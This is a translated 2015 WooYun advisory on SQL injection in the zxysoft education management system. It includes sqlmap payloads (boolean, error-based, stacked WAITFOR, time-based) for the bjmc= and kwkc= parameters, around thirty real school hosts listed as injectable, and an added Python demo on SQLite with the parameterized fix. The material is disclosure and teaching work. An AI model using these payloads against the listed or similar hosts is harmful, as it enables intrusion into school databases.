
Vulnerability summary

Defect ID: wooyun-2015-0107560

Title: zxysoft education management system, generic vulnerability

Vendor: 安徽中鑫云信息科技公司 (Anhui Zhongxinyun Information Technology)

Author: 路人甲 (WooYun's anonymous handle)

Submitted: 2015-04-20 12:23

Fixed: 2015-07-23 09:46

Published: 2015-07-23 09:46

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-20: Details sent to the vendor, awaiting vendor response
2015-04-24: Vendor confirmed; details visible to the vendor only
2015-04-27: Details opened to third-party security partners
2015-06-18: Details opened to core white hats and domain experts
2015-06-28: Details opened to regular white hats
2015-07-08: Details opened to intern white hats
2015-07-23: Details made public

Brief description:

A batch of issues.

Detailed description:

http://www.zxysoft.com/
Everything below is reproducible on the vendor's official demo sites.
Injection point #1:
http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42
In the timetable query (xsbjkb.asp), the bjmc= parameter is injectable. sqlmap output:
Place: GET
Parameter: bjmc
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bjmc=11%BF%B5%B8%B42' AND 2757=2757 AND 'EAmE'='EAmE
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: bjmc=11%BF%B5%B8%B42' AND 4494=CONVERT(INT,(CHAR(58)+CHAR(102)+CHAR(114)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (4494=4494) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(112)+CHAR(115)+CHAR(58))) AND 'PvRa'='PvRa
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: bjmc=11%BF%B5%B8%B42'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: bjmc=11%BF%B5%B8%B42' WAITFOR DELAY '0:0:5'--
---
Database: ReportServerTempDB
[9 tables]

[screenshot: 园丁1.png]


Affected instances (the same module on other deployments):
http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42
http://218.22.37.5/webkbgl/xsbjkb.asp?bjmc=12%B8%DF%D6%B03
http://61.190.13.56/webkbgl/xsbjkb.asp?bjmc=11%B8%DF%D6%B0%B9%A4%D4%EC01
http://218.22.50.19/webkbgl/xsbjkb.asp?bjmc=12%B5%E7%D7%D3%D0%C5%CF%A2%B9%A4%B3%CC1
http://220.178.75.155/webksbm/default.asp
http://61.190.12.151:3880/webkbgl/xsbjkb.asp?bjmc=10-47
http://zyk.ahjsxx.cn/webkbgl/xsbjkb.asp?bjmc=11%BB%E1%BC%C6%D6%D0%D7%A8
http://jwgl.ahjsxy.cn/webkbgl/xsbjkb.asp?bjmc=11%BB%E1%BC%C6%D6%D0%D7%A8
http://220.165.147.248:8000/xsbjkb.asp?bjmc=271
http://lhub.cn:9000/webkbgl/xsbjkb.asp?bjmc=%E5%8A%A8%E6%BC%AB141
http://jxgl.ahiib.com/webkbgl/xsbjkb.asp?bjmc=%B1%A8%B9%D8131
http://61.190.17.182/webkbgl/xsbjkb.asp?bjmc=13%B2%E8%D2%D5
/webkbgl/
http://61.190.13.56/webkbgl/xsbjkb.asp?bjmc=11%B8%DF%D6%B0%B9%A4%D4%EC02
http://218.23.109.102/webkbgl/xsbjkb.asp?bjmc=13%B2%C6%B9%DC1
http://218.23.105.20:90/webkbgl/xsbjkb.asp?bjmc=%B2%E2%C1%BF1309
http://218.22.26.105/webkbgl/xsbjkb.asp?bjmc=13%B7%A8%C2%C901
http://218.22.191.26:9200/
Injection point #2: in the exam scheduling module:
http://60.166.58.70:8080/webkbgl/kwxskc.asp?kwkc=2
The kwkc= parameter is injectable (it appears in both kwxskc.asp and kwbkkc.asp in the instances below):

[screenshot: 园丁2.png]


Affected instances:
http://60.166.58.70:8080/webkbgl/kwxskc.asp?kwkc=2
http://61.190.12.151:3880/webkbgl/kwxskc.asp?kwkc=1
http://zyk.ahjsxx.cn/webkbgl/kwbkkc.asp?kwkc=1
http://jwgl.ahjsxy.cn/webkbgl/kwbkkc.asp?kwkc=1
http://lhub.cn:9000/webkbgl/kwbkkc.asp?kwkc=4
www.hftyxy.com/cjgl/webkbgl/kwbkkc.asp?kwkc=3
http://jxgl.ahiib.com/webkbgl/kwbkkc.asp?kwkc=1
http://61.190.13.56/webkbgl/kwxskc.asp?kwkc=1
http://218.23.109.102/webkbgl/kwbkkc.asp?kwkc=1
http://218.23.105.20:90/webkbgl/kwxskc.asp?kwkc=1
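The following is an added example, not code from the zxysoft product, the reporter or WooYun. It reproduces the bjmc= pattern from injection point #1 (the kwkc= parameter in #2 is the same class of bug) on an in-memory SQLite table that stands in for the MSSQL backend: the vulnerable string-concatenated query, the sqlmap boolean-based check using the exact payload from the report, why the CONVERT(INT, ...) error-based payload leaks its answer through the database error text, and the parameterized query that closes the hole. The table and column names, the sample rows and the sample error message are assumptions; the MSSQL-only WAITFOR and CONVERT behaviour is not executed here, only the message parsing is.

```python
"""Added example for this advisory (not the vendor's or reporter's code).
Reproduces the bjmc= injection on SQLite as a stand-in for MSSQL."""
import re
import sqlite3
from urllib.parse import unquote_to_bytes

# Constructed sample timetable rows; the class names match two of the demo URLs
# (table name 'kb' and column names are assumed, not taken from the product).
ROWS = [
    ("11康复2", "Mon-1", "Anatomy"),
    ("11康复2", "Mon-2", "Physiology"),
    ("12高职3", "Tue-1", "Accounting"),
]


def decode_bjmc(raw):
    """The demo sites send bjmc URL-encoded in GBK (%BF%B5%B8%B4 -> 康复);
    decode it the way the ASP page would before it reaches the SQL string."""
    return unquote_to_bytes(raw).decode("gbk")


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE kb (bjmc TEXT, slot TEXT, course TEXT)")
    con.executemany("INSERT INTO kb VALUES (?, ?, ?)", ROWS)
    return con


def query_vulnerable(con, bjmc):
    """Mirrors the classic-ASP anti-pattern: the parameter is pasted into the
    SQL text, so a quote in bjmc ends the literal and the rest is executed."""
    sql = "SELECT slot, course FROM kb WHERE bjmc='" + bjmc + "'"
    return con.execute(sql).fetchall()


def query_fixed(con, bjmc):
    """Parameterized form: bjmc is bound as data and never parsed as SQL."""
    return con.execute(
        "SELECT slot, course FROM kb WHERE bjmc=?", (bjmc,)
    ).fetchall()


def boolean_blind_check(run, base):
    """sqlmap's boolean-based blind test as applied to bjmc: the response for
    an appended TRUE condition must equal the baseline, and the response for a
    FALSE condition must differ. `run` maps a parameter value to a response."""
    true_p = base + "' AND 2757=2757 AND 'EAmE'='EAmE"   # payload from the report
    false_p = base + "' AND 2757=2758 AND 'EAmE'='EAmE"  # same shape, false condition
    baseline = run(base)
    return baseline == run(true_p) and baseline != run(false_p)


def extract_error_based(error_text):
    """The error-based payload builds ':fry:' + (1 or 0) + ':ips:' and forces
    CONVERT(INT, ...) on it; MSSQL's conversion error echoes the offending
    string, so the 1/0 answer can be read straight from the error page.
    Returns the echoed bit, or None if the page shows no such error."""
    m = re.search(r":fry:([01]):ips:", error_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    con = make_db()
    base = decode_bjmc("11%BF%B5%B8%B42")
    print("decoded bjmc:", base)
    print("vulnerable endpoint injectable:",
          boolean_blind_check(lambda p: query_vulnerable(con, p), base))
    print("parameterized endpoint injectable:",
          boolean_blind_check(lambda p: query_fixed(con, p), base))
    # Constructed MSSQL-style conversion error for illustration.
    print("leaked bit:", extract_error_based(
        "Conversion failed when converting the varchar value "
        "':fry:1:ips:' to data type int."))
```

The boolean check is deliberately the weakest form of the test (exact response equality); sqlmap additionally tolerates dynamic page content, but the logic is the same. The stacked-query payload in the report (`'; WAITFOR DELAY '0:0:5'--`) matters more than the blind ones: it shows the backend will execute an arbitrary second statement, which on a sufficiently privileged login goes well beyond reading timetable rows.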

Proof of vulnerability:

Identical to the detailed description above (same two injection points, sqlmap output, screenshots and instance lists).

Remediation:

Filter the input. More precisely: stop concatenating the bjmc and kwkc parameters into the SQL text and bind them as query parameters instead; the stacked-query and time-based payloads above show that whatever is appended to the parameter is executed by the database.

Copyright notice: when reposting, credit the source as 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-04-24 09:44

Vendor reply:

CNVD did not reproduce the described situation; CNVD has notified the software vendor and 赛尔教育 (Saier Education) through the contact details published on their websites.

Latest status:

None